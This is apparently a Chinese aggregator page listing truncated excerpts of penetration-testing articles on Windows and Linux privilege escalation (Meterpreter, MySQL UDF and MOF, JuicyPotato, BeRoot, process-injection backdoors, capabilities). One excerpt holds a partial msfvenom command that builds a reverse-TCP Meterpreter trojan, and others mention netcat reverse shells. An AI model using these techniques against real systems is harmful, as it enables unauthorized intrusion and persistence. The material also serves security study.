原文:Meterpreter提權詳解

x Meterpreter自動提權 .生成后門程序 我們在 kali的命令行下直接執行以下命令獲得一個針對windows的反彈型木馬: msfvenom p windows meterpreter reverse tcp lhost . . . lport f exe o tmp hack.exe這里我們為生成的木馬指定了 payload為: windows meterpreter revers ...

2018-08-16 03:03 1 14079 推薦指數:

查看詳情

udf原理詳解

0x00-前言 這個udf復現搞了三天,終於搞出來了。網上的教程對於初學者不太友好,以至於我一直迷迷糊糊的,走了不少彎路。下面就來總結一下我的理解。 想要知道udf是怎么回事,首先要先知道udf是什么。 環境: 本機os: win10 靶機os: win7 php: 5.4.45 ...

Sun May 13 08:08:00 CST 2018 5 2294

(( nc反彈 )) 當可以執行net user,但是不能建立用戶時,就可以用NC反彈試下,特別是內網服務器,最好用NC反彈。 不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個端口外的所有端口,那么這種方法也失效了…. 找個可讀 ...

Tue Aug 01 07:02:00 CST 2017 0 1143

【 web 】 1.能不能執行cmd就看這個命令:net user,net不行就用net1,再不行就上傳一個net到可寫可讀目錄,執行/c c:\windows\temp\cookies\net1.exe user 2.當成功,3389沒開的情況下,上傳開3389的vps沒成功時,試試 ...

Wed May 17 04:24:00 CST 2017 0 2283
后滲透輔助工具BeRoot詳解

0x00 工具介紹 前言 BeRoot是一個后期開發工具,用於檢查常見的Windows的配置錯誤,以方便找到提高我們的方法。其二進制編譯地址為: https://github.com/AlessandroZ/BeRoot/releases 它將作為后開發模塊被添加到pupy(Pupy ...

Wed Aug 09 22:36:00 CST 2017 0 1111
小神器-JuicyPotato多種應用場景詳解

前言 有技術交流或滲透測試培訓需求的朋友歡迎聯系QQ/VX-547006660,需要代碼審計、滲透測試、紅藍對抗網絡安全相關業務可以看置頂博文 2000人網絡安全交流群,歡迎大佬們來玩 群號820 ...

Tue Dec 21 19:31:00 CST 2021 0 1420
MySQL之mof

mof原理 關於 mof 的原理其實很簡單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鍾都會在一個特定的時間去執行一次的特性,來寫入我們的cmd命令使其被帶入執行。下面簡單演示下 mof 的過程! MOF ...

Sat May 30 19:13:00 CST 2020 0 1427
】注入進程

注入進程【相當於開了一個后門,隱蔽性極高,不會創建新的進程,很難發現】 注入到system用戶的進程,當管理員賬戶或其他賬戶注銷后,后門仍然存在。可以理解為將pinjector注入到其他用戶的進程里一起運行,進而同時擁有了對應的權限。 下面是圖文教程。 0x01 從http ...

Sat Dec 31 23:22:00 CST 2016 0 2000
Linux之:利用capabilities

Linux之:利用capabilities 目錄 Linux之:利用capabilities 1 背景 2 Capabilities機制 3 線程與文件的capabilities 3.1 線程的capabilities ...

Sat Mar 19 21:04:00 CST 2022 0 2187
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM